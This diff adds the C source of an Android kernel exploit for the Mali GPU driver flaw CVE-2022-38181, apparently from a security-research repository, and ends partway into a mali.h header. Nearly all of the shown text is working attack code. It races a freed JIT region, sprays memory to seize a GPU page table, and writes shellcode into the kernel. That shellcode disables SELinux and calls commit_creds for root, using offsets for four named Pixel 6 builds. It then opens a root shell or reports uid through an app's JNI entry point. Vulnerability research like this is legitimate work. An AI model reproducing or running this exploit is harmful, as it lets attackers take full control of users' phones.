+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+ struct kbase_ioctl_mem_flags_change change = {0};
+ change.flags = flags;
+ change.gpu_va = gpu_addr;
+ change.mask = flags;
+ if (ignore_results) {
+ ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+ return;
+ }
+ if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+ err(1, "flags_change failed\n");
+ }
+}
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+ err(1, "mem_alias failed\n");
+ }
+}
+
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+ err(1, "mem_query failed\n");
+ }
+}
+
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+ struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages};
+ if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+ err(1, "mem_commit failed\n");
+ }
+}
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+int migrate_to_cpu(int i)
+{
+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ return -1;
+ }
+ return 0;
+}
+
+void* flush(int spray_cpu, int idx) {
+ migrate_to_cpu(spray_cpu);
+ void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (region == MAP_FAILED) err(1, "flush failed");
+ memset(region, idx, FLUSH_SIZE);
+ return region;
+}
+
+/*
+ * reserve_pages - allocate `nents` GPU regions of `pages` committed pages
+ * each, storing the returned GPU VA handles in reserved_va[0..nents-1].
+ * The handles are later turned into CPU mappings by map_reserved().
+ */
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+  for (int i = 0; i < nents; i++) {
+    union kbase_ioctl_mem_alloc alloc = {0};
+    alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+    alloc.in.va_pages = pages;
+    alloc.in.commit_pages = pages;
+    mem_alloc(mali_fd, &alloc);
+    reserved_va[i] = alloc.out.gpu_va;
+  }
+}
+
+/*
+ * map_reserved - mmap each reserved region into the CPU address space.
+ * The mmap offset is the GPU VA handle from reserve_pages; each
+ * reserved_va[i] is REPLACED in place with the resulting CPU address.
+ * Exits on mmap failure.
+ */
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed");
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+/*
+ * alias_sprayed_regions - create one KBASE_IOCTL_MEM_ALIAS region that
+ * aliases all SPRAY_NUM sprayed regions (gpu_va[]), then mmap the alias
+ * read-only, one mapping per aliased region, into alias_regions[].
+ * Returns the CPU address of the first alias mapping.
+ * Statement order matters here (alias ioctl before the mmaps); left as-is.
+ */
+uint64_t alias_sprayed_regions(int mali_fd) {
+ union kbase_ioctl_mem_alias alias = {0};
+ alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ alias.in.stride = SPRAY_PAGES;
+
+ alias.in.nents = SPRAY_NUM;
+ struct base_mem_aliasing_info ai[SPRAY_NUM];
+ for (int i = 0; i < SPRAY_NUM; i++) {
+ ai[i].handle.basep.handle = gpu_va[i];
+ ai[i].length = SPRAY_PAGES;
+ ai[i].offset = 0;
+ }
+ alias.in.aliasing_info = (uint64_t)(&(ai[0]));
+ mem_alias(mali_fd, &alias);
+ uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
+ void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap alias failed");
+ }
+ alias_regions[0] = region;
+ /* Subsequent mappings are taken at fixed strides from the first
+  * mapping's address, one per aliased sub-region. */
+ for (int i = 1; i < SPRAY_NUM; i++) {
+ void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
+ if (this_region == MAP_FAILED) {
+ err(1, "mmap alias failed %d\n", i);
+ }
+ alias_regions[i] = this_region;
+ }
+ return (uint64_t)region;
+}
+
+/*
+ * fault_pages - touch the first byte of every sprayed region (write) and of
+ * every alias mapping (read) so all backing pages are faulted in.  The sum
+ * of reads is logged only to keep the loads from being optimized away.
+ * NOTE(review): the local `read` shadows read(2); harmless here but worth
+ * renaming if this block is ever reworked.
+ */
+void fault_pages() {
+ int read = 0;
+ for (int va = 0; va < SPRAY_NUM; va++) {
+ uint8_t* this_va = (uint8_t*)(gpu_va[va]);
+ *this_va = 0;
+ uint8_t* this_alias = alias_regions[va];
+ read += *this_alias;
+ }
+ LOG("read %d\n", read);
+}
+
+/*
+ * find_freed_idx - query the commit size of every sprayed region; the one
+ * whose commit size no longer equals SPRAY_PAGES is the region whose backing
+ * pages were freed.  Returns its index, or -1 if none differ.  If several
+ * differ, the last one wins (loop does not break) — kept as-is.
+ */
+int find_freed_idx(int mali_fd) {
+ int freed_idx = -1;
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = gpu_va[j];
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
+ if (query.out.value != SPRAY_PAGES) {
+ LOG("jit_free commit: %d %llu\n", j, query.out.value);
+ freed_idx = j;
+ }
+ }
+ return freed_idx;
+}
+
+/*
+ * find_pgd - scan the alias mapping of the freed region, page by page from
+ * start_pg, for a 64-bit word whose low bits match 0x443.  NOTE(review):
+ * 0x443 presumably matches the attribute bits of a valid GPU page-table
+ * entry for this driver/GPU — confirm against the kbase MMU code.
+ * Returns the page index within the region, or -1 if not found.
+ */
+int find_pgd(int freed_idx, int start_pg) {
+ uint64_t* this_alias = alias_regions[freed_idx];
+ for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = this_alias[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ return pg;
+ }
+ }
+ }
+ return -1;
+}
+
+/* Low 32 bits of a 64-bit value. */
+uint32_t lo32(uint64_t x) {
+  return (uint32_t)x;
+}
+
+/* High 32 bits of a 64-bit value. */
+uint32_t hi32(uint64_t x) {
+  return (uint32_t)(x >> 32);
+}
+
+/*
+ * write_adrp - encode an AArch64 ADRP instruction: "adrp xRD, <label>"
+ * as executed from address `pc`, i.e. load the 4KB-page base of `label`
+ * relative to the page of `pc` into register rd.
+ * @rd:    destination register number (0-31).
+ * @pc:    address the instruction will execute from.
+ * @label: target address whose page base is wanted.
+ * Returns the 32-bit instruction word.
+ * (Fix: local was misspelled `adpr`; renamed to `insn`. Logic unchanged.)
+ */
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+  uint64_t pc_page = pc >> 12;
+  uint64_t label_page = label >> 12;
+  int64_t offset = (label_page - pc_page) << 12;
+  int64_t immhi_mask = 0xffffe0;
+  int64_t immhi = offset >> 14;        /* bits [32:14] of offset -> immhi */
+  int32_t immlo = (offset >> 12) & 0x3; /* bits [13:12] of offset -> immlo */
+  uint32_t insn = rd & 0x1f;           /* Rd in bits [4:0] */
+  insn |= (1 << 28);                   /* fixed opcode bit */
+  insn |= (1 << 31);                   /* op = 1 => ADRP (page-relative) */
+  insn |= immlo << 29;
+  insn |= (immhi_mask & (immhi << 5));
+  return insn;
+}
+
+/*
+ * fixup_root_shell - patch the root_code[] shellcode template with the
+ * build-specific kernel addresses: ADRP/ADD pairs that load init_cred into
+ * x0 and commit_creds into x8 (PC-relative to read_enforce, where the code
+ * will be placed), followed by a fixed call sequence.
+ * NOTE(review): indices 4-7 are hard-coded while the ADRP/ADD slots use
+ * named *_INDEX constants — presumably 4-7 follow the last named slot;
+ * confirm the constants' values.
+ */
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+/*
+ * set_addr_lv3 - within the naturally aligned 512-page window containing
+ * addr (the span covered by one level-3 table), return the address of page
+ * 0x100: clear the low 9 bits of the page frame number and set bit 8.
+ */
+uint64_t set_addr_lv3(uint64_t addr) {
+  uint64_t pfn = (addr >> PAGE_SHIFT) & ~0x1FFUL;
+  return (pfn | 0x100UL) << PAGE_SHIFT;
+}
+
+/*
+ * compute_pt_index - index of `addr` within the page table at the given
+ * translation level (9 bits of virtual page-frame number per level;
+ * level 3 is the least-significant group).
+ */
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+  uint64_t shift = PAGE_SHIFT + 9 * (3 - level);
+  return (addr >> shift) & 0x1FF;
+}
+
+/*
+ * write_to - submit a single WRITE_VALUE GPU job that writes `value` to
+ * GPU address `gpu_addr` (`type` selects 32- vs 64-bit immediate).  A fresh
+ * one-page job chain region is mapped for each call; the job header and
+ * payload are packed into it and submitted via KBASE_IOCTL_JOB_SUBMIT.
+ * Sleeps 10ms afterwards to let the job complete (no completion wait).
+ * NOTE(review): `section` is unused; the per-call jc_region is never
+ * unmapped — acceptable for a short-lived PoC.
+ */
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+/*
+ * write_func - copy `shellcode` (code_size 32-bit words) over the kernel
+ * function at kernel VA `func`, writing through the GPU.  For every page in
+ * each of the `size` reserved regions, derive the candidate overwrite
+ * address with set_addr_lv3() and, whenever it changes, write the words in
+ * reverse order via write_to() (each write is a separate GPU job).
+ * func_offset is the function's offset within its 4KB page.
+ * (Fix: removed dead locals start_idx/end_idx — computed but never used.)
+ */
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+  uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+  uint64_t curr_overwrite_addr = 0;
+  for (int i = 0; i < size; i++) {
+    uint64_t base = reserved[i];
+    uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+    for (uint64_t addr = base; addr < end; addr += 0x1000) {
+      uint64_t overwrite_addr = set_addr_lv3(addr);
+      if (curr_overwrite_addr != overwrite_addr) {
+        LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+        curr_overwrite_addr = overwrite_addr;
+        /* Write back-to-front so the function's entry word lands last. */
+        for (int code = code_size - 1; code >= 0; code--) {
+          write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+        }
+        usleep(300000);
+      }
+    }
+  }
+}
+
+/*
+ * run_enforce - read the first byte of /sys/fs/selinux/enforce and return
+ * it as an int ('0'/'1' as ASCII; '2' i.e. 50 if the file could not be
+ * opened or read).  Sleeps 3s first before checking.
+ * (Fix: the original called read()/close() on an unchecked fd, so a failed
+ * open() led to syscalls on fd -1; now guarded.)
+ */
+int run_enforce() {
+  char result = '2';
+  sleep(3);
+  int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+  if (enforce_fd >= 0) {
+    read(enforce_fd, &result, 1);
+    close(enforce_fd);
+  }
+  LOG("result %d\n", result);
+  return result;
+}
+
+/*
+ * select_offset - pick the kernel symbol offsets matching the device's
+ * exact firmware build, keyed on ro.build.fingerprint (four Pixel 6
+ * "oriole" builds are supported).  Sets the globals avc_deny and
+ * sel_read_enforce and patches the shellcode via fixup_root_shell.
+ * Exits if the fingerprint is not one of the known builds.
+ * NOTE(review): `len` is unused; __system_property_get's return value is
+ * ignored, so an unset property would leave `fingerprint` stale — the
+ * strcmp table then falls through to err(), which is safe.
+ */
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
+ avc_deny = AVC_DENY_2108;
+ sel_read_enforce = SEL_READ_ENFORCE_2108;
+ fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
+ avc_deny = AVC_DENY_2201;
+ sel_read_enforce = SEL_READ_ENFORCE_2201;
+ fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
+ avc_deny = AVC_DENY_2202;
+ sel_read_enforce = SEL_READ_ENFORCE_2202;
+ fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
+ avc_deny = AVC_DENY_2207;
+ sel_read_enforce = SEL_READ_ENFORCE_2207;
+ fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
+/*
+ * cleanup - via a GPU job, write the value 2 back into the page-table entry
+ * at OVERWRITE_INDEX of `pgd`.  NOTE(review): 2 presumably restores the
+ * entry to the driver's "invalid/unmapped" marker — confirm against the
+ * kbase MMU code.
+ */
+void cleanup(int mali_fd, uint64_t pgd) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+/*
+ * write_shellcode - with GPU write access to a page table (`pgd`), point a
+ * PTE at the kernel page containing avc_deny, overwrite avc_deny with the
+ * `permissive` shellcode, trigger it, then repeat for sel_read_enforce with
+ * the credential-overwriting `root_code`.  The 0x443 bits are the same PTE
+ * attribute pattern find_pgd() scans for.
+ */
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+ uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+/*
+ * spray - allocate and map 64 GPU regions of SPRAY_PAGES reserved (but
+ * uncommitted, commit_pages = 0) pages each, in two batches of 32, storing
+ * the CPU mapping addresses in gpu_va[0..63].  The cookies[] array of GPU
+ * VA handles is reused by the second batch.  Note these allocations lack
+ * BASE_MEM_PROT_GPU_WR, unlike drain_mem_pool/reserve_pages.
+ * NOTE(review): assumes gpu_va has at least 64 entries and SPRAY_NUM
+ * covers both batches — confirm the constants.
+ */
+void spray(int mali_fd) {
+ uint64_t cookies[32] = {0};
+ for (int j = 0; j < 32; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j] = alloc.out.gpu_va;
+ }
+ for (int j = 0; j < 32; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+ for (int j = 32; j < 64; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j - 32] = alloc.out.gpu_va;
+ }
+ for (int j = 32; j < 64; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+}
+
+/*
+ * trigger - one attempt at the bug: create a JIT allocation, mark it
+ * DONT_NEED, then race MEM_QUERY against it for up to NUM_TRIALS
+ * iterations (each preceded by a cache-flush allocation).  When the query
+ * ioctl fails, the JIT region has been freed while handles remain; the
+ * function then sprays replacement regions, aliases and faults them,
+ * drains/releases the memory pool, frees the JIT id, and locates the
+ * region whose pages were reused as a GPU page table (find_freed_idx /
+ * find_pgd) before overwriting kernel code via write_shellcode.
+ * Returns 0 on success, -1 to retry (advancing jit_id and *flush_idx).
+ * Statement order throughout is timing-critical; left byte-identical.
+ */
+int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
+ if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
+ err(1, "Out of memory.");
+ }
+ void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+
+ uint64_t jit_pages = SPRAY_PAGES;
+ uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr);
+ atom_number++;
+ mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
+ for (int i = 0; i < NUM_TRIALS; i++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = jit_addr;
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx);
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+ migrate_to_cpu(SPRAY_CPU);
+ spray(mali_fd);
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES);
+ }
+ LOG("region freed %d\n", i);
+
+ uint64_t alias_region = alias_sprayed_regions(mali_fd);
+ fault_pages();
+ LOG("cleanup flush region\n");
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+ uint64_t drain = drain_mem_pool(mali_fd);
+ release_mem_pool(mali_fd, drain);
+
+ jit_free(mali_fd, atom_number, jit_id);
+
+ map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ LOG("jit_freed\n");
+ int freed_idx = find_freed_idx(mali_fd);
+ if (freed_idx == -1) err(1, "Failed to find freed_idx");
+ LOG("Found freed_idx %d\n", freed_idx);
+ int pgd_idx = find_pgd(freed_idx, 0);
+ if (pgd_idx == -1) err(1, "Failed to find pgd");
+ uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
+ LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
+ atom_number++;
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd);
+ return 0;
+ }
+ }
+ LOG("failed, retry.\n");
+ jit_id++;
+ *flush_idx += NUM_TRIALS;
+ return -1;
+}
+
+#ifdef SHELL
+
+/*
+ * main (standalone SHELL build): set up two driver contexts — mali_fd for
+ * the JIT bug/spray, mali_fd2 for the reserved regions used to reach the
+ * overwritten page table — then retry trigger() up to 10 times, dropping
+ * to a shell on success.  stdout/stderr are unbuffered for live logging.
+ * NOTE(review): tracking_page is unused; falling off main returns 0 (C99).
+ */
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ system("sh");
+ break;
+ }
+ }
+}
+#else
+/* Fix: the include target was lost in transcription (angle brackets eaten
+ * as markup); JNIEXPORT/JNIEnv/JNICALL come from jni.h — confirm against
+ * the original repository. */
+#include <jni.h>
+/*
+ * JNI entry point (app build): same flow as the standalone main — select
+ * offsets, open two driver contexts, reserve pages, retry trigger() up to
+ * 10 times — but sleeps 10s first and returns 0 on success (logging the
+ * resulting uid/euid) instead of spawning a shell.  Returns -1 on failure.
+ * NOTE(review): tracking_page is unused, as in main().
+ */
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+  setbuf(stdout, NULL);
+  setbuf(stderr, NULL);
+  sleep(10);
+
+  select_offset();
+  int mali_fd = open_dev(MALI);
+
+  setup_mali(mali_fd, 0);
+
+  void* tracking_page = setup_tracking_page(mali_fd);
+  jit_init(mali_fd, 0x1000, 100, 0);
+
+  int mali_fd2 = open_dev(MALI);
+  setup_mali(mali_fd2, 1);
+  setup_tracking_page(mali_fd2);
+  reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+  int flush_idx = 0;
+  for (int i = 0; i < 10; i++) {
+    if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+      LOG("uid: %d euid %d", getuid(), geteuid());
+      return 0;
+    }
+  }
+  return -1;
+}
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include
+#include
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
